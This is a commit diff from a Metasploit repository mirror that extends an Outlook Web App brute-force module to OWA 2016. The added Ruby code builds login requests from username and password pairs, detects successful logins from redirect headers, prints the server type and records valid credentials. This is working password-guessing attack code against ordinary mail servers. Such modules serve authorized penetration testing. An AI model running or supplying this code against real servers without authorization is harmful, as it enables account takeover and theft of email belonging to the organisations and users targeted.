adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial OWA 2016 support

Browse Source
This commit is contained in:
Brent Cook
2017-10-31 14:48:42 -05:00
parent 3d67d2ed12
commit 56c00a8cb6
1 changed files with 19 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/auxiliary/scanner/http/owa_login.rb
+19 -9
View File
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
super(
'Name' => 'Outlook Web App (OWA) Brute Force Utility',
'Description' => %q{
This module tests credentials on OWA 2003, 2007, 2010, and 2013 servers.
This module tests credentials on OWA 2003, 2007, 2010, 2013, and 2016 servers.
},
'Author' =>
[
@@ -68,6 +68,15 @@ class MetasploitModule < Msf::Auxiliary
'InboxPath' => '/owa/',
'InboxCheck' => /Inbox|logoff\.owa/
}
],
[
'OWA_2016',
{
'Description' => 'OWA version 2016',
'AuthPath' => '/owa/auth.owa',
'InboxPath' => '/owa/',
'InboxCheck' => /Inbox|logoff\.owa/
}
]
],
'DefaultAction' => 'OWA_2013',
@@ -158,13 +167,13 @@ class MetasploitModule < Msf::Auxiliary
}
if datastore['SSL']
if action.name == "OWA_2013"
if ["OWA_2013", "OWA_2016"].include?(action.name)
data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
else
data = 'destination=https://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
end
else
if action.name == "OWA_2013"
if ["OWA_2013", "OWA_2016"].include?(action.name)
data = 'destination=http://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1'
else
data = 'destination=http://' << vhost << '&flags=0&trusted=0&username=' << user << '&password=' << pass
@@ -201,12 +210,12 @@ class MetasploitModule < Msf::Auxiliary
vprint_status("#{msg} Resolved hostname '#{datastore['RHOST']}' to address #{res.peerinfo['addr']}")
end
if action.name != "OWA_2013" and res.get_cookies.empty?
if !["OWA_2013", "OWA_2016"].include?(action.name) && res.get_cookies.empty?
print_error("#{msg} Received invalid repsonse due to a missing cookie (possibly due to invalid version), aborting")
return :abort
end
if action.name == "OWA_2013"
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
if ["OWA_2013", "OWA_2016"].include?(action.name)
# Check for a response code to make sure login was valid. Changes from 2010 to 2013 / 2016
# Check if the password needs to be changed.
if res.headers['location'] =~ /expiredpassword/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}': NOTE password change required")
@@ -222,8 +231,9 @@ class MetasploitModule < Msf::Auxiliary
# No password change required moving on.
# Check for valid login but no mailbox setup
if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}': NOTE a mailbox is not setup")
print_good("server type: #{res.headers["X-FEServer"]}")
if res.headers['location'] =~ /owa/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
report_cred(
ip: res.peerinfo['addr'],
port: datastore['RPORT'],
@@ -235,7 +245,7 @@ class MetasploitModule < Msf::Auxiliary
end
unless location = res.headers['location']
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
print_error("#{msg} No HTTP redirect. This is not OWA 2013 / 2016 system, aborting.")
return :abort
end
reason = location.split('reason=')[1]